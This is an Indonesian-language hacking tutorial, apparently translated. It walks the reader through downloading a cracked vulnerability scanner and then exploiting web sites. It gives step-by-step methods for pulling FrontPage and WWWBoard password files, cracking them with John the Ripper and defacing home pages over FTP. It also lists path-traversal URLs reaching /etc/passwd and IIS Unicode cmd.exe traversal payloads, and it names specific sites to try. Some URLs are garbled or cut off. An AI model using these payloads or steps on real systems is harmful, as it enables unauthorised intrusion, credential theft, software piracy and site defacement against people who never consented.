1. Program Shadow Security Scanner
Untuk mendown load program ini, Antum bisa meng-klik link berikut ini (juga tutorial tentang program crack): http://mirror1.safety-lab.com/SSS.exe
Untuk download program crack: http://www.aldamar.net/index_files/license.zip
Untuk download program transfer ke dalam bahasa arab: http://www.aldamar.net/index_files/ssslanguage.zip
Untuk download link penjelasan tutorial program ini, klik: http://www.aldamar.net/index_files/ssslanguage.zip
Program ini sangat populer dan memiliki kecepatan tinggi dalam mencari celah dan bugs suatu situs. Setelah di download, lakukan penginstalan dan pengoperasikan program. Antum akan diminta updating, klik saja Yes. Setelah itu, matikan program ini. Tugas utama Antum adalah membuat file License.key dari hasil cracking, setelah itu meletakkan file ini dalam program. Setelah itu, jalankan kembali program, maka file akan terbuka. Kemudian, Antum akan ditanya,
“Apakah Anda mau Mendaftar?” jawab dengan mengklik button Done. Penjelasan seputar program, sudah ada di dalam link di atas, Alhamdulillah…
2. Program CGI Scanner
Ini adalah program khusus yang mencari bugs CGI. Program ini adalah yang terbaik untuk mencari bugs ini, wallôhu A‘lam… program ini –alhamdulillah— juga sudah ada di daftar link di atas.
3. Program Uni Scan
Antum bisa mendapatkan program ini pada link berikut: http://online.securityfocus.com/data/tools/uniscan.zip
Program ini sama dengan dua program sebelumnya, hanya saja program ini khusus mencari bugs Unicode.
Sampai di sini kita telah mengetahui cara mencari bugs (celah, titik lemah) pada sebuah situs.
Langkah berikutnya adalah, bagaimana memanfaatkan bugs yang sudah kita temukan.
Cara menembus bugs:
a. Posisi penembusan bugs:
http://www.xxxxx.com/scripts/..&Aa....exe?/c+dir+c:\ yaitu, setelah alamat utama URL (setelah penulisan .com). Mungkin akan ada yang bertanya, Apanya yang kelihatan? Dan bentuknya kayak apa? Jawabannya sederhana saja, kalau hal ini Antum tulis di DOS, akan muncul file-file DIR. Nah, cara menampakkan file-file pada explorer, kira-kira sama dengan cara dalam DOS. Wallôhu A‘lam…
b. Penjelasan tentang berbagai macam bugs dan cara memanfaatkannya:
1. Penjelasan tentang bugs pada Front Page dan cara memanfaatkannya:
Bugs Front Page adalah bugs yang banyak sekali tersebar di situs-situs yang ada. Biasanya, bentuknya adalah sebagai berikut: www.***.com/_vti_pvt
Maka, yang dimaksud di sini, bugs nya adalah _vti_pvt. Dari sini nanti, akan terlihat di depan Antum file-file Front Page dalam situs dan nama operatornya.
Catatan penting:
Bugs ini hanya bisa ditembus dan hanya ada pada situs yang menggunakan Front Page, dan tidak cocok untuk selain ini. Sehingga, Antum harus tahu lebih dahulu apakah situs itu memakai Front Page atau tidak, dengan masuk ke situs: http://www.netcraft.net
Setelah masuk, ada kotak segi panjang di hadapan Antum. Nah, masukkan nama situs yang akan Antum cari data tentangnya. Yang penting bagi kita hanya satu file saja, yang lain biasanya tidak terlalu penting, file itu adalah: sercive.pwd
Kalau kita buka dengan explorer, akan kita lihat pass wordnya masih samar (dalam bentuk kode). Jadi bentuk adalah sebagai berikut:
-FrontPage-
Ekendall: bYld1Sr73NLKo
Louisa: 5zm94d7cdDFiQ
Di sini kita lihat, situs itu memakai dua operator, yaitu Ekandall dan Louisa. Tentu, kedua kode di atas akan kita pecahkan dengan program Jhon The Ripper. Setelah berhasil memecahkan kode Password, kita buka kembali Front Page, lalu klik: File �� Open Web. Lalu, tulislah alamat situs itu, maka akan segera muncul tampilan utamanya (home). Sekarang, silahkan rubah apa yang Antum mau rubah, dan setelah itu jangan lupa Save or publish.
Setelah itu, Antum akan diminta mengisi user name dan password, ini mudah Insyâ Alloh. Tulis saja user name dan passwordnya seperti biasa, lalu klik sign.
Situs di bawah ini, akan kita coba sebagai percobaan, dengan bantuan Alloh:
http://www.heyerl st.org/garderobe/_vt _pvt (silahkan coba ya… --penerj.)
2. Penjelasan tentang bugs WWWBoard
Ini adalah bugs yang paling mudah pada Front Page. Taruhlah situs yang akan kita serang adalah http://www.boardprep.net/ (Sekali lagi ini sekedar contoh), dan Antum lihat di belakangnya belum ada bugs nya. Sekarang, kita tambahkan di belakangnya: wwwboard/passwd.txt
Sehingga, alamat URL nya menjadi: http://www.boardprep.net/wwwboard/passwd.txt
Ketika Antum buka alamat URL di atas, akan muncul: Cknouse: aexMVWnDOyrdE
Artinya, user namenya adalah cknouse, sedangkan kode passwordnya adalah: aexMVWnDOyrdE
Pecahkan sandi di atas dengan program Jhon The Ripper. Ok, sekarang Antum sudah punya user namenya dan sekaligus kode passwordnya. Lalu, apa langkah berikutnya? Bagaimana cara mengubah tampilan utama situs?
Sekarang, kita buka program FTP, setelah itu ketikkan: ftp.domen.com. Perhatikan, kata domen.com gantilah dengan alamat situs yang sudah Antum pegang user name dan passwordnya. Setelah itu, silahkan isi username dan passwordnya, dan masukklah ke dalam situs. Selanjutnya, buatlah satu tampilan baru dan beri nama file: index.html, setelah itu
silahkan di upload ke situs.
Untuk mendownload program FTP, klik link di bawah ini: http://members.home.nl/patrick.pagina/temp/Ws-ftp32. zip
3. Penjelasan tentang CGI Bugs dan cara memanfaatkannya:
Ada bugs-bugs yang langsung bisa diaplikasikan melalui explorer, seperti Unicode, dan beberapa bugs pada CGI. Hanya saja, sebagian –atau mungkin sebagian besar—bugs yang diaplikasikan lewat explorer, hanya dapat dipastikan keberadaannya melalui explorer.
Bugs-bugs yang bisa dimanfaatkan langsung dari explorer contohnya adalah: /cgi-bin/passwd.txt
Kalau situsnya adalah: www.suatusitus.com, maka pada explorer Antum tulis begini: www.sebuahsitus.com/cgi-bin/passwd.txt
Selanjutnya, bugs ini akan menampilkan buat Antum user name dan password-password yang digunakan oleh para pengguna situs. Seperti pimpinan redaksi, serta siapa saja yang diperbolehkan masuk ke dalam gudang data situs itu.
Tentu saja, jangan sekali-kali Antum coba menggunakan bugs ini sekarang, kecuali kalau Antum ingin menyerang situs di Zimbabwe, yang oleh pengelolanya sudah ditelantarkan sejak 10 tahun lalu. Bugs ini mungkin sudah tidak lagi cocok untuk situs tersebut, karena sudah sangat populer.
Khusus untuk mengambil kelemahan dari file-file CGI & Perl sehingga kita bisa sampai kepada .etc/passwd, maka kita akan mengambil bugs jenis Show Files. Ketika file /cgi-bin/apexec.pl? dan password, maka kita harus menggunakan bugs ini untuk bisa sampai kepada:
http://www.target.com/cgibin/ apexe...te=../../../../../../../../../etc/resolv.conf.html&pa ssurl=/category/
dengan mengganti phat nya sesuai dengan nama file yang diinginkan. Ini untuk Perl. Hal yang sama juga berlaku pada CGI (/cgi-bin/hsx.cgi?) ketika file ini ditemukan di /cgi-bin/
Silahkan Antum coba bugs berikut ini:
http://www.Target.com/cgi-bin/hs .c..../etc/passwd
Cara paling baik untuk mendapatkan file ini adalah dengan memakai metode acak, atau dengan menggunakan program Scan sehingga bugs-bugs yang ada pada situs bisa dideteksi.
Letakkan file-file itu pada kolom bugs, seperti /cgi-bin/hsx.cgi, ketika itu ditemukan, bugs sudah bisa digunakan, dengan bantuan Alloh.
4. Penjelasan tentang Bugs IIS dan cara memanfaatkannya:
IIS adalah Internet Information Service
Biasanya kita menggunakan bugs-nya dengan program Unicode’s, dan itu jenisnya banyak sekali, di antaranya:
http://www.xxx.com/scripts/..&Aacu...d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Agra...d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Agra...d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Agra...d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Aacu...d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Aacu...d.exe?/:c+d r+c http://www.xxx.com/scripts/..&Aacu.../cmd.exe?/c+dir +c: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/sy stem32/cmd.exe?/c+dir+c: /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe ?/c+dir+c:
